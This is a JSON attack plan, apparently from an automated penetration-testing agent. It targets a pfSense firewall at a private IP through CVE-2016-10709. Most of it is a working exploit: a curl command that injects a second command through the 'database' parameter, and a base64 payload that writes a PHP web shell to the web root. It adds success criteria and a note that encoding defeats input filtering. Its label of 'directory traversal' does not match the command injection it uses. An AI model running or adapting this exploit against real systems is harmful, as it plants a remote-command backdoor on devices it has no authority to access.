{
"plan_id": "plan_1737134892_001",
"target_ip": "10.129.12.97",
"context_hash": "pfsense_cve201610709_lighttpd1435",
"attack_vectors": [
{
"vector_id": "vec_01",
"priority": 1,
"action": {
"tool_name": "exploit_runner",
"command_template": "curl -k 'https://{target}/status_rrd_graph_img.php' --data 'database=/var/db/rrd/wan-quality.rrd%3Becho+{encoded_payload}+|+base64+-d+|+sh%3B'",
"parameters": {
"target": "10.129.12.97",
"encoded_payload": "ZWNobyAnPD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+JyA+IC91c3IvbG9jYWwvd3d3L3NoZWxsLnBocA=="
},
"timeout_seconds": 30
},
"prediction_metrics": {
"classification": {
"attack_type": "RCE",
"mitre_id": "T1190",
"cve_id": "CVE-2016-10709"
},
"hypothesis": {
"confidence_score": 0.85,
"rationale_tags": [
"pfsense_confirmed",
"lighttpd_version_match",
"rag_playbook_success",
"manual_exploitation"
],
"expected_success": true
},
"success_criteria": {
"match_type": "file_creation",
"match_pattern": "shell.php created successfully",
"negative_pattern": "(404 Not Found|403 Forbidden|Connection refused)"
}
},
"rag_context": {
"payload_snippet": "echo '<?php system($_GET[\"cmd\"]); ?>' > /usr/local/www/shell.php",
"insight": "Public exploits fail due to strict filtering - manual base64 encoding bypasses input validation",
"exploitation_logic": "Use directory traversal via database parameter, base64 encode PHP payload to bypass filters, write web shell to accessible www directory",
"vulnerability_context": "pfSense versions in which an unpatched status_rrd_graph_img.php allows command injection through the database parameter",
"source": "pfsense_cve201610709_playbook"
}
}
],
"created_at": "2025-01-17T18:34:52Z"
}